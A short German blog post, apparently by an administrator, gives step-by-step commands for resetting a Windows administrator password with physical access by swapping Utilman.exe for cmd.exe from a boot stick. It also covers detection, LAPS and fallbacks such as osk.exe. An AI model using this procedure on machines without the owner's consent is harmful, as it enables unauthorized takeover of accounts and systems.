Windows Passwort knacken revisited

  • Über das Media Creation Tool einen USB-Stick mit Windows 10 vorbereiten
  • von diesem Stick einen PC booten
  • Sprache auswählen, Reparatur-Optionen, Kommandozeile
  • cd C:\Windows\system32\
  • ren Utilman.exe Utilman.irgendwas.exe
  • copy cmd.exe Utilman.exe
  • Bootstick schließen, PC neustarten
  • im Anmeldebildschirm die Eingabehilfen aufrufen
  • net users Administrator wasauchimmer
  • eventuell noch ein net users Administrator /active:yes
  • Alternativ mit jedem anderen Benutzer der von einem net users gelistet wird

Spätestens nach dem nächsten Neustart trägt der Administratorbenutzer nun das Kennwort „wasauchimmer“ – wie ihr es oben ja angegeben habt. Wollt ihr kein Klartextkennwort auf dem Bildschirm lasst das Kennwort weg, dann wird doppelt nach dem Kennwort gefragt ohne dass es angezeigt wird.
Die C-Platte ist auch im Bootstick die Systemplatte im PC, der Stick selbst hängt sich mit anderen Buchstaben ein.

Nach getaner Arbeit tut ihr das gleiche noch mal, nur eben wieder richtig umbenennen. Nun könnt ihr auch über die Menüoption „erweiterter Start“ in die Reparatur-CMD booten, dazu ist dann euer gesetztes Kennwort notwendig.

Dies ist kein spurenloser Angriff, sofern ihr das Kennwort welches es mal war nicht kanntet (was ja der Regelfall ist). LAPS wird dadurch nicht gebrochen, es gibt aber auch keinen großen Sicherheitsalarm wenn sich der Hash der Utilman.exe auf einmal geändert hat… Wenn doch, dann versucht ihr es halt mal mit der osk.exe oder ähnlichem. In dem Fall ist LAPS sogar ziemlich zuträglich weil das local-admin-Kennwort alsbald wieder auf die Domäne angepasst wird.

Es würde theoretisch mit jeder Distribution funktionieren, aber die Hersteller verpacken Secure Boot hinter immer mehr Fallstricken, da ist ein Windows-10-Bootstick doch besser.
Ohne Stick funktioniert das alles nicht, weil die erweiterten Startoptionen von der Maschine selbst vor der Reparatur-CMD mal eben Daten aus dem SAM-Accountspeicher sehen wollen, die ihr ja erst habt wenn ihr sie auch gesetzt habt.

Einzelne Aspekte könnten sich immer mal wieder ändern, ich könnte mir gut vorstellen dass demnächst auch die Stick-Reparaturoptionen Adminkennwörter für die cmd sehen wollen. Dann müsst ihr halt statt Windows ein Kali auf den Stick schreiben.
Warum Microsoft die Prozesse im Anmeldebildschirm unbedingt als nt-authority\system starten muss, müsste mir aber auch jemand noch mal erklären. Aber so lange Microsoft das noch so tut wird die Methode mit leichten Abwandlungen immer funktionieren.